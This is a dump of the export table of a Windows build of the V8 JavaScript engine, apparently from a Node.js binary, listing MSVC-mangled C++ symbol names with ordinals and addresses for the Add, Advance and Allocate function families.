                                                                                                                                                                                                        ?AddPosition@SourcePositionTableBuilder@internal@v8@@QEAAX_KVSourcePosition@23@_N@Z29600x140a7f110
                                                                                                                                                                                                        ?AddPotentiallyDeadCode@WasmEngine@wasm@internal@v8@@QEAA_NPEAVWasmCode@234@@Z29610x1405546a0
                                                                                                                                                                                                        ?AddPredecessor@BasicBlock@compiler@internal@v8@@QEAAXPEAV1234@@Z29620x140ee1f60
                                                                                                                                                                                                        ?AddProperty@JSObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z29630x140831f40
                                                                                                                                                                                                        ?AddPropertyClassRange@RegExpParser@internal@v8@@AEAA_NPEAV?$ZoneList@VCharacterRange@internal@v8@@@23@_NAEBV?$ZoneVector@D@23@2@Z29640x14071c0c0
                                                                                                                                                                                                        ?AddProtectedInstructionLanding@CodeGenerator@compiler@internal@v8@@QEAAXII@Z29650x140ee4fd0
                                                                                                                                                                                                        ?AddRange@AddressToTraceMap@internal@v8@@QEAAX_KHI@Z29660x140763190
                                                                                                                                                                                                        ?AddRanger@OperationTyper@compiler@internal@v8@@AEAA?AVType@234@NNNN@Z29670x1410a08a0
                                                                                                                                                                                                        ?AddRawLiteralChar@Scanner@internal@v8@@AEAAXI@Z29680x140481ab0
                                                                                                                                                                                                        ?AddReducer@GraphReducer@compiler@internal@v8@@QEAAXPEAVReducer@234@@Z29690x140f37150
                                                                                                                                                                                                        ?AddRef@CodeEntryStorage@internal@v8@@QEAAXPEAVCodeEntry@23@@Z29700x14074d810
                                                                                                                                                                                                        ?AddRef@WasmCodeRefScope@wasm@internal@v8@@SAXPEAVWasmCode@234@@Z29710x140568710
                                                                                                                                                                                                        ?AddResumeTarget@LoopInfo@compiler@internal@v8@@QEAAXAEBVResumeJumpTarget@234@@Z29720x140f91d90
                                                                                                                                                                                                        ?AddRetainedMap@Heap@internal@v8@@QEAAXV?$Handle@VNativeContext@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@@Z29730x1409af170
                                                                                                                                                                                                        ?AddReturn@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z29740x140ee1f80
                                                                                                                                                                                                        ?AddSample@ProfilerEventsProcessor@internal@v8@@QEAAXUTickSample@23@@Z29750x140761110
                                                                                                                                                                                                        ?AddScheduledBytesToMark@IncrementalMarking@internal@v8@@AEAAX_K@Z29760x1409a6810
                                                                                                                                                                                                        ?AddScopeSample@GCTracer@internal@v8@@QEAAXW4ScopeId@Scope@123@N@Z29770x140952920
                                                                                                                                                                                                        ?AddScopeSampleBackground@GCTracer@internal@v8@@QEAAXW4ScopeId@Scope@123@N@Z29780x1409c8380
                                                                                                                                                                                                        ?AddSharedWasmMemory@Isolate@internal@v8@@QEAAXV?$Handle@VWasmMemoryObject@internal@v8@@@23@@Z29790x140a0b8e0
                                                                                                                                                                                                        ?AddSignature@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAV?$Signature@VValueType@wasm@internal@v8@@@34@@Z29800x14053f5b0
                                                                                                                                                                                                        ?AddSlot@FeedbackVectorSpec@internal@v8@@AEAA?AVFeedbackSlot@23@W4FeedbackSlotKind@23@@Z29810x140878d70
                                                                                                                                                                                                        ?AddStoreDataPropertyInLiteralICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29820x140481b20
                                                                                                                                                                                                        ?AddStoreGlobalICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z29830x140481b40
                                                                                                                                                                                                        ?AddStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z29840x140481b70
                                                                                                                                                                                                        ?AddStoreInArrayLiteralICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29850x140481ba0
                                                                                                                                                                                                        ?AddStoreOwnICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29860x140481bc0
                                                                                                                                                                                                        ?AddStructType@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAVStructType@234@@Z29870x14053f680
                                                                                                                                                                                                        ?AddSuccessor@BasicBlock@compiler@internal@v8@@QEAAXPEAV1234@@Z29880x140ee2010
                                                                                                                                                                                                        ?AddSuccessor@Schedule@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@0@Z29890x140ee2030
                                                                                                                                                                                                        ?AddSuccessorForTesting@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@0@Z29900x1404c18f0
                                                                                                                                                                                                        ?AddSurvivalRatio@GCTracer@internal@v8@@QEAAXN@Z29910x1409c83e0
                                                                                                                                                                                                        ?AddSwitch@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@PEAPEAV5234@_K@Z29920x140ee2080
                                                                                                                                                                                                        ?AddTable@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@I@Z29930x14053f6c0
                                                                                                                                                                                                        ?AddTable@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@II@Z29940x14053f820
                                                                                                                                                                                                        ?AddTable@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@IIVWasmInitExpr@234@@Z29950x14053f980
                                                                                                                                                                                                        ?AddTailCall@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z29960x140ee2160
                                                                                                                                                                                                        ?AddTemplateExpression@Parser@internal@v8@@AEAAXPEAPEAVTemplateLiteral@123@PEAVExpression@23@@Z29970x1407a38a0
                                                                                                                                                                                                        ?AddTemplateSpan@Parser@internal@v8@@AEAAXPEAPEAVTemplateLiteral@123@_N1@Z29980x1407a3900
                                                                                                                                                                                                        ?AddTerminator@InstructionScheduler@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z29990x140f539d0
                                                                                                                                                                                                        ?AddTerminator@InstructionSelector@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z30000x140ed4230
                                                                                                                                                                                                        ?AddThreadSafeEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModulesPerIsolate@23@@Z30010x140078990
                                                                                                                                                                                                        ?AddThrow@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z30020x140ee21f0
                                                                                                                                                                                                        ?AddTimedSample@TimedHistogram@internal@v8@@QEAAXVTimeDelta@base@3@@Z30030x1408dca70
                                                                                                                                                                                                        ?AddToEnd@WeakArrayList@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@AEBVMaybeObjectHandle@23@2@Z30040x1407f09e0
                                                                                                                                                                                                        ?AddToEnd@WeakArrayList@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@AEBVMaybeObjectHandle@23@@Z30050x1407f0c50
                                                                                                                                                                                                        ?AddToEquivalenceSet@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@0@Z30060x1408f7dd0
                                                                                                                                                                                                        ?AddToScriptList@Factory@internal@v8@@AEAAXV?$Handle@VScript@internal@v8@@@23@@Z30070x1409ce140
                                                                                                                                                                                                        ?AddToScriptList@LocalFactory@internal@v8@@AEAAXV?$Handle@VScript@internal@v8@@@23@@Z30080x140078990
                                                                                                                                                                                                        ?AddToUnion@Type@compiler@internal@v8@@CAHV1234@PEAVUnionType@234@HPEAVZone@34@@Z30090x140e9f920
                                                                                                                                                                                                        ?AddTranslationForOperand@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@PEAVInstructionOperand@234@VMachineType@34@@Z30100x140ee5000
                                                                                                                                                                                                        ?AddTypeProfileSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ30110x140878f30
                                                                                                                                                                                                        ?AddUInt64@Bignum@base@v8@@QEAAX_K@Z30120x140e6fb70
                                                                                                                                                                                                        ?AddUnresolved@Scope@internal@v8@@QEAAXPEAVVariableProxy@23@@Z30130x140af27a0
                                                                                                                                                                                                        ?AddUseInterval@TopLevelLiveRange@compiler@internal@v8@@QEAAXVLifetimePosition@234@0PEAVZone@34@_N@Z30140x140f7f380
                                                                                                                                                                                                        ?AddUsePosition@TopLevelLiveRange@compiler@internal@v8@@QEAAXPEAVUsePosition@234@_N@Z30150x140f7f4b0
                                                                                                                                                                                                        ?AddWrapperInfoForTesting@ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAAXU?$pair@PEAXPEAX@std@@@Z30160x1409e6020
                                                                                                                                                                                                        ?AddWriter@NativeModule@wasm@internal@v8@@QEAAXXZ30170x140481be0
                                                                                                                                                                                                        ?AddWriter@WasmCodeAllocator@wasm@internal@v8@@QEAAXXZ30180x140568760
                                                                                                                                                                                                        ?AddressUsesRegister@Operand@internal@v8@@QEBA_NVRegister@23@@Z30190x14050c510
                                                                                                                                                                                                        ?Addresses@StackTrace@debug@base@v8@@QEBAPEBQEBXPEA_K@Z30200x140e6c0d0
                                                                                                                                                                                                        ?AdjustAmountOfExternalAllocatedMemory@Isolate@v8@@QEAA_J_J@Z30210x140b08560
                                                                                                                                                                                                        ?AdjustRepresentation@OrderedHashMapHandler@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@@Z30220x1407e2d90
                                                                                                                                                                                                        ?AdjustRepresentation@OrderedHashSetHandler@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@@Z30230x1407e2f10
                                                                                                                                                                                                        ?AdjustRepresentation@OrderedNameDictionaryHandler@internal@v8@@KA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@@Z30240x1407e3030
                                                                                                                                                                                                        ?AdjustSamplingInterval@CpuProfiler@internal@v8@@AEAAXXZ30250x140761180
                                                                                                                                                                                                        ?AdjustSchedulingParams@OS@base@v8@@SAXXZ30260x140078990
                                                                                                                                                                                                        ?AdjustStackLimitForSimulator@StackGuard@internal@v8@@QEAAXXZ30270x140a006f0
                                                                                                                                                                                                        ?Advance@BytecodeArrayIterator@interpreter@internal@v8@@QEAAXXZ30280x140481c20
                                                                                                                                                                                                        ?Advance@BytecodeOffsetIterator@baseline@internal@v8@@QEAAXXZ30290x140481c50
                                                                                                                                                                                                        ?Advance@FeedbackIterator@internal@v8@@QEAAXXZ30300x140878f70
                                                                                                                                                                                                        ?Advance@Iterator@BitVector@internal@v8@@QEAAXXZ30310x1404bb220
                                                                                                                                                                                                        ?Advance@JavaScriptFrameIterator@internal@v8@@QEAAXXZ30320x140a202b0
                                                                                                                                                                                                        ?Advance@RegExpParser@internal@v8@@AEAAXH@Z30330x14071c9a0
                                                                                                                                                                                                        ?Advance@RegExpParser@internal@v8@@AEAAXXZ30340x14071c9b0
                                                                                                                                                                                                        ?Advance@RelocIterator@internal@v8@@AEAAXH@Z30350x140475f50
                                                                                                                                                                                                        ?Advance@SourcePositionTableIterator@internal@v8@@QEAAXXZ30360x140a7f190
                                                                                                                                                                                                        ?Advance@StackFrameIterator@internal@v8@@QEAAXXZ30370x140a20420
                                                                                                                                                                                                        ?Advance@StackTraceFrameIterator@internal@v8@@QEAAXXZ30380x140a204e0
                                                                                                                                                                                                        ?Advance@iterator@StateValuesAccess@compiler@internal@v8@@AEAAXXZ30390x140f56e40
                                                                                                                                                                                                        ?AdvanceAllocationObservers@AllocationCounter@internal@v8@@QEAAX_K@Z30400x1409f3660
                                                                                                                                                                                                        ?AdvanceAllocationObservers@SpaceWithLinearArea@internal@v8@@QEAAXXZ30410x140955df0
                                                                                                                                                                                                        ?AdvanceAndInvokeAllocationObservers@LargeObjectSpace@internal@v8@@IEAAX_K0@Z30420x1409a45e0
                                                                                                                                                                                                        ?AdvanceCurrentPosition@RegExpBytecodeGenerator@internal@v8@@UEAAXH@Z30430x14073c7b0
                                                                                                                                                                                                        ?AdvanceCurrentPosition@RegExpMacroAssemblerX64@internal@v8@@UEAAXH@Z30440x1404aa560
                                                                                                                                                                                                        ?AdvanceGetTag@RelocIterator@internal@v8@@AEAAHXZ30450x140a80620
                                                                                                                                                                                                        ?AdvanceIncrementalGarbageCollectionOnAllocationIfNeeded@HeapBase@internal@cppgc@@QEAAXXZ30460x1404655d0
                                                                                                                                                                                                        ?AdvanceLastProcessedMarker@LiveRange@compiler@internal@v8@@AEBAXPEAVUseInterval@234@VLifetimePosition@234@@Z30470x140f7f5a0
                                                                                                                                                                                                        ?AdvanceLocation@EhFrameWriter@internal@v8@@QEAAXH@Z30480x140a405b0
                                                                                                                                                                                                        ?AdvanceMarkingOnAllocation@MarkerBase@internal@cppgc@@QEAAXXZ30490x14045dac0
                                                                                                                                                                                                        ?AdvanceMarkingWithLimits@MarkerBase@internal@cppgc@@QEAA_NVTimeDelta@base@v8@@_K@Z30500x14045db40
                                                                                                                                                                                                        ?AdvanceOnAllocation@IncrementalMarking@internal@v8@@AEAAXXZ30510x1409a6830
                                                                                                                                                                                                        ?AdvanceOneFrame@StackTraceFrameIterator@internal@v8@@QEAAXXZ30520x14049b830
                                                                                                                                                                                                        ?AdvancePolymorphic@FeedbackIterator@internal@v8@@AEAAXXZ30530x140879060
                                                                                                                                                                                                        ?AdvanceReadData@RelocIterator@internal@v8@@AEAAXXZ30540x140a80630
                                                                                                                                                                                                        ?AdvanceReadInt@RelocIterator@internal@v8@@AEAAXXZ30550x140a806c0
                                                                                                                                                                                                        ?AdvanceReadLongPCJump@RelocIterator@internal@v8@@AEAAXXZ30560x140a80700
                                                                                                                                                                                                        ?AdvanceReadPC@RelocIterator@internal@v8@@AEAAXXZ30570x140a80750
                                                                                                                                                                                                        ?AdvanceRegister@RegExpBytecodeGenerator@internal@v8@@UEAAXHH@Z30580x14073c820
                                                                                                                                                                                                        ?AdvanceRegister@RegExpMacroAssemblerX64@internal@v8@@UEAAXHH@Z30590x1404aa5a0
                                                                                                                                                                                                        ?AdvanceTillNotEmpty@iterator@StateValuesAccess@compiler@internal@v8@@QEAA_KXZ30600x140f56e70
                                                                                                                                                                                                        ?AdvanceToBytecodeOffset@BytecodeOffsetIterator@baseline@internal@v8@@QEAAXH@Z30610x140481d10
                                                                                                                                                                                                        ?AdvanceToNextPage@PagedSpaceObjectIterator@internal@v8@@AEAA_NXZ30620x1409644f0
                                                                                                                                                                                                        ?AdvanceToPCOffset@BytecodeOffsetIterator@baseline@internal@v8@@QEAAX_K@Z30630x140481e00
                                                                                                                                                                                                        ?AdvanceTracing@CppHeap@internal@v8@@UEAA_NN@Z30640x1409e9070
                                                                                                                                                                                                        ?AdvanceWithDeadline@IncrementalMarking@internal@v8@@QEAA?AW4StepResult@23@NW4CompletionAction@123@W4StepOrigin@23@@Z30650x1409a6b90
                                                                                                                                                                                                        ?AggregateError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ30660x140481ef0
                                                                                                                                                                                                        ?AggregateError_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ30670x1406cd390
                                                                                                                                                                                                        ?Align@AlignedSlotAllocator@internal@v8@@QEAAHH@Z30680x140ab4ab0
                                                                                                                                                                                                        ?Align@Assembler@internal@v8@@QEAAXH@Z30690x14050c590
                                                                                                                                                                                                        ?Align@Bignum@base@v8@@AEAAXAEBV123@@Z30700x140e6fbe0
                                                                                                                                                                                                        ?AlignFrame@Frame@compiler@internal@v8@@QEAAXH@Z30710x140ee30b0
                                                                                                                                                                                                        ?AlignSavedCalleeRegisterSlots@Frame@compiler@internal@v8@@QEAAXH@Z30720x1404bb300
                                                                                                                                                                                                        ?AlignedAlloc@internal@v8@@YAPEAX_K0@Z30730x1406b5510
                                                                                                                                                                                                        ?AlignedFree@internal@v8@@YAXPEAX@Z30740x1406b5590
                                                                                                                                                                                                        ?AlignmentRequirements@InstructionSelector@compiler@internal@v8@@SA?AV0MachineOperatorBuilder@234@XZ30750x1404c1900
                                                                                                                                                                                                        ?AllBitsClearInRange@?$ConcurrentBitmap@$00@internal@v8@@QEAA_NII@Z30760x1409759c0
                                                                                                                                                                                                        ?AllBitsSetInRange@?$ConcurrentBitmap@$00@internal@v8@@QEAA_NII@Z30770x140975a50
                                                                                                                                                                                                        ?AllFramesOnStackAreBlackboxed@Debug@internal@v8@@QEAA_NXZ30780x140a5ce00
                                                                                                                                                                                                        ?AllInRangeOrTopBitSet@SimdSwizzle@wasm@internal@v8@@SA_NV?$array@E$0BA@@std@@@Z30790x140573220
                                                                                                                                                                                                        ?AllValueInputsAreTyped@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@@Z30800x140eac230
                                                                                                                                                                                                        ?AllocatableMemoryInCodePage@MemoryChunkLayout@internal@v8@@SA_KXZ30810x140973a90
                                                                                                                                                                                                        ?AllocatableMemoryInDataPage@MemoryChunkLayout@internal@v8@@SA_KXZ30820x140973ae0
                                                                                                                                                                                                        ?AllocatableMemoryInMemoryChunk@MemoryChunkLayout@internal@v8@@SA_KW4AllocationSpace@23@@Z30830x140973b00
                                                                                                                                                                                                        ?AllocatableRegisters@CallDescriptor@compiler@internal@v8@@QEBAIXZ30840x14036d6d0
                                                                                                                                                                                                        ?Allocate@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@W4SnapshotSpace@23@HW4AllocationAlignment@23@@Z30850x1406d6a80
                                                                                                                                                                                                        ?Allocate@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@W4SnapshotSpace@23@HW4AllocationAlignment@23@@Z30860x1406d6bd0
                                                                                                                                                                                                        ?Allocate@?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z30870x1407e31e0
                                                                                                                                                                                                        ?Allocate@?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z30880x1407e3240
                                                                                                                                                                                                        ?Allocate@?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z30890x1407e32a0
                                                                                                                                                                                                        ?Allocate@AlignedSlotAllocator@internal@v8@@QEAAHH@Z30900x140ab4ae0
                                                                                                                                                                                                        ?Allocate@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_KW4SharedFlag@23@W4InitializedFlag@23@@Z30910x1408c90f0
                                                                                                                                                                                                        ?Allocate@DisjointAllocationPool@wasm@internal@v8@@QEAA?AVAddressRegion@base@4@_K@Z30920x140568770
                                                                                                                                                                                                        ?Allocate@FreeList@internal@cppgc@@QEAA?AUBlock@123@_K@Z30930x140466a70
                                                                                                                                                                                                        ?Allocate@FreeListMany@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z30940x1409cca70
                                                                                                                                                                                                        ?Allocate@FreeListManyCached@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z30950x1409ccbb0
                                                                                                                                                                                                        ?Allocate@FreeListManyCachedFastPath@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z30960x1409ccd30
                                                                                                                                                                                                        ?Allocate@FreeListManyCachedOrigin@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z30970x1409cd010
                                                                                                                                                                                                        ?Allocate@Isolate@internal@v8@@CAPEAV123@_N@Z30980x140a0bb60
                                                                                                                                                                                                        ?Allocate@Isolate@v8@@SAPEAV12@XZ30990x140b08630
                                                                                                                                                                                                        ?Allocate@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4AllocationType@34@PEAV5234@@Z31000x140f58ab0
                                                                                                                                                                                                        ?Allocate@MakeGarbageCollectedTraitInternal@internal@cppgc@@CAPEAXAEAVAllocationHandle@3@_KG@Z31010x14044f970
                                                                                                                                                                                                        ?Allocate@MakeGarbageCollectedTraitInternal@internal@cppgc@@CAPEAXAEAVAllocationHandle@3@_KGUCustomSpaceIndex@3@@Z31020x14044f9c0
                                                                                                                                                                                                        ?Allocate@NormalPageMemoryRegion@internal@cppgc@@QEAAXPEAE@Z31030x140458900
                                                                                                                                                                                                        ?Allocate@OS@base@v8@@CAPEAXPEAX_K1W4MemoryPermission@123@@Z31040x140e5fb00
                                                                                                                                                                                                        ?Allocate@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@W4AllocationType@34@@Z31050x140f4b670
                                                                                                                                                                                                        ?AllocateAndInstallRequestedHeapObjects@Assembler@internal@v8@@AEAAXPEAVIsolate@23@@Z31060x14050c5b0
                                                                                                                                                                                                        ?AllocateBasicChunk@MemoryAllocator@internal@v8@@QEAAPEAVBasicMemoryChunk@23@_K0W4Executability@23@PEAVBaseSpace@23@@Z31070x1409748a0
                                                                                                                                                                                                        ?AllocateChunk@MemoryAllocator@internal@v8@@QEAAPEAVMemoryChunk@23@_K0W4Executability@23@PEAVBaseSpace@23@@Z31080x140974bb0
                                                                                                                                                                                                        ?AllocateCode@CodeBuilder@Factory@internal@v8@@AEAA?AV?$MaybeHandle@VCode@internal@v8@@@34@_N@Z31090x1409ce190
                                                                                                                                                                                                        ?AllocateData@ControlEquivalence@compiler@internal@v8@@AEAAXPEAVNode@234@@Z31100x14104f0a0
                                                                                                                                                                                                        ?AllocateDeferredConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ31110x140919210
                                                                                                                                                                                                        ?AllocateElements@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0W4ElementsKind@34@AEBV?$vector@PEAVNode@compiler@internal@v8@@V?$allocator@PEAVNode@compiler@internal@v8@@@std@@@std@@W4AllocationType@34@@Z31120x141000180
                                                                                                                                                                                                        ?AllocateElements@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0W4ElementsKind@34@HW4AllocationType@34@@Z31130x141000440
                                                                                                                                                                                                        ?AllocateEmpty@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@KA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@W4RootIndex@23@@Z31140x1407e3310
                                                                                                                                                                                                        ?AllocateEmpty@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@KA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@W4RootIndex@23@@Z31150x1407e3370
                                                                                                                                                                                                        ?AllocateEmpty@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@KA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@W4RootIndex@23@@Z31160x1407e33d0
                                                                                                                                                                                                        ?AllocateEmpty@OrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@@Z31170x1407e3310
                                                                                                                                                                                                        ?AllocateEmpty@OrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@@Z31180x1407e3370
                                                                                                                                                                                                        ?AllocateEmpty@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@W4AllocationType@23@@Z31190x1407e3430
                                                                                                                                                                                                        ?AllocateEntry@V8HeapExplorer@internal@v8@@UEAAPEAVHeapEntry@23@PEAX@Z31200x1407534f0
                                                                                                                                                                                                        ?AllocateEntry@V8HeapExplorer@internal@v8@@UEAAPEAVHeapEntry@23@VSmi@23@@Z31210x140753500
                                                                                                                                                                                                        ?AllocateEnvironmentThreadId@node@@YA?AUThreadId@1@XZ31220x14028c160
                                                                                                                                                                                                        ?AllocateExternalBackingStore@Heap@internal@v8@@QEAAPEAXAEBV?$function@$$A6APEAX_K@Z@std@@_K@Z31230x1409af720
                                                                                                                                                                                                        ?AllocateFastAligned@NewSpace@internal@v8@@AEAA?AVAllocationResult@23@HPEAHW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31240x140481f00
                                                                                                                                                                                                        ?AllocateFastAligned@PagedSpace@internal@v8@@IEAA?AVAllocationResult@23@HPEAHW4AllocationAlignment@23@@Z31250x140481fe0
                                                                                                                                                                                                        ?AllocateFastUnaligned@NewSpace@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationOrigin@23@@Z31260x1404820a0
                                                                                                                                                                                                        ?AllocateFastUnaligned@PagedSpace@internal@v8@@IEAA?AVAllocationResult@23@H@Z31270x140482120
                                                                                                                                                                                                        ?AllocateForDeserializedCode@NativeModule@wasm@internal@v8@@QEAA?AU?$pair@V?$Vector@E@base@v8@@UJumpTablesRef@NativeModule@wasm@internal@3@@std@@_K@Z31280x140568c90
                                                                                                                                                                                                        ?AllocateFromFreeList@ObjectAllocator@internal@cppgc@@AEAAPEAXAEAVNormalPageSpace@23@_KG@Z31290x1404594f0
                                                                                                                                                                                                        ?AllocateHeapSlot@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z31300x140af2920
                                                                                                                                                                                                        ?AllocateInLabSlow@ConcurrentAllocator@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31310x1409f0900
                                                                                                                                                                                                        ?AllocateInOldGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ31320x140f55590
                                                                                                                                                                                                        ?AllocateInOldGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ31330x140f58b50
                                                                                                                                                                                                        ?AllocateInRegion@DisjointAllocationPool@wasm@internal@v8@@QEAA?AVAddressRegion@base@4@_KV564@@Z31340x140568d40
                                                                                                                                                                                                        ?AllocateInYoungGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ31350x140f55620
                                                                                                                                                                                                        ?AllocateInYoungGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ31360x140f58bb0
                                                                                                                                                                                                        ?AllocateIndex@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVEntry@1234@@Z31370x1408f4ef0
                                                                                                                                                                                                        ?AllocateIndexArray@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVEntry@1234@_K@Z31380x1408f4f60
                                                                                                                                                                                                        ?AllocateIndirectFunctions@WasmModuleBuilder@wasm@internal@v8@@QEAAII@Z31390x14053fb80
                                                                                                                                                                                                        ?AllocateJumpTable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAPEAVBytecodeJumpTable@234@HH@Z31400x140919220
                                                                                                                                                                                                        ?AllocateLargePage@LargeObjectSpace@internal@v8@@IEAAPEAVLargePage@23@HW4Executability@23@@Z31410x1409a4660
                                                                                                                                                                                                        ?AllocateLargePageMemory@PageBackend@internal@cppgc@@QEAAPEAE_K@Z31420x140458970
                                                                                                                                                                                                        ?AllocateLiteralRegExp@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0VRegExpBoilerplateDescriptionRef@234@@Z31430x1410006e0
                                                                                                                                                                                                        ?AllocateLocals@DeclarationScope@internal@v8@@QEAAXXZ31440x140af2950
                                                                                                                                                                                                        ?AllocateNode@CrossThreadPersistentRegion@internal@cppgc@@QEAAPEAVPersistentNode@23@PEAXP6AXPEAVVisitor@3@PEBX@Z@Z31450x14044f8c0
                                                                                                                                                                                                        ?AllocateNode@PersistentRegion@internal@cppgc@@QEAAPEAVPersistentNode@23@PEAXP6AXPEAVVisitor@3@PEBX@Z@Z31460x14044f920
                                                                                                                                                                                                        ?AllocateNonParameterLocal@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z31470x140af2bf0
                                                                                                                                                                                                        ?AllocateNonParameterLocalsAndDeclaredGlobals@Scope@internal@v8@@AEAAXXZ31480x140af2c90
                                                                                                                                                                                                        ?AllocateNormalPageMemory@PageBackend@internal@cppgc@@QEAAPEAE_K@Z31490x140458a90
                                                                                                                                                                                                        ?AllocateObject@ObjectAllocator@internal@cppgc@@QEAAPEAX_KG@Z31500x14044f970
                                                                                                                                                                                                        ?AllocateObject@ObjectAllocator@internal@cppgc@@QEAAPEAX_KGUCustomSpaceIndex@3@@Z31510x14044f9c0
                                                                                                                                                                                                        ?AllocateObjectOnSpace@ObjectAllocator@internal@cppgc@@AEAAPEAXAEAVNormalPageSpace@23@_KG@Z31520x14044f9f0
                                                                                                                                                                                                        ?AllocateOutsideLab@ConcurrentAllocator@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31530x1409f0ad0
                                                                                                                                                                                                        ?AllocatePage@PagedSpace@internal@v8@@IEAAPEAVPage@23@XZ31540x140964520
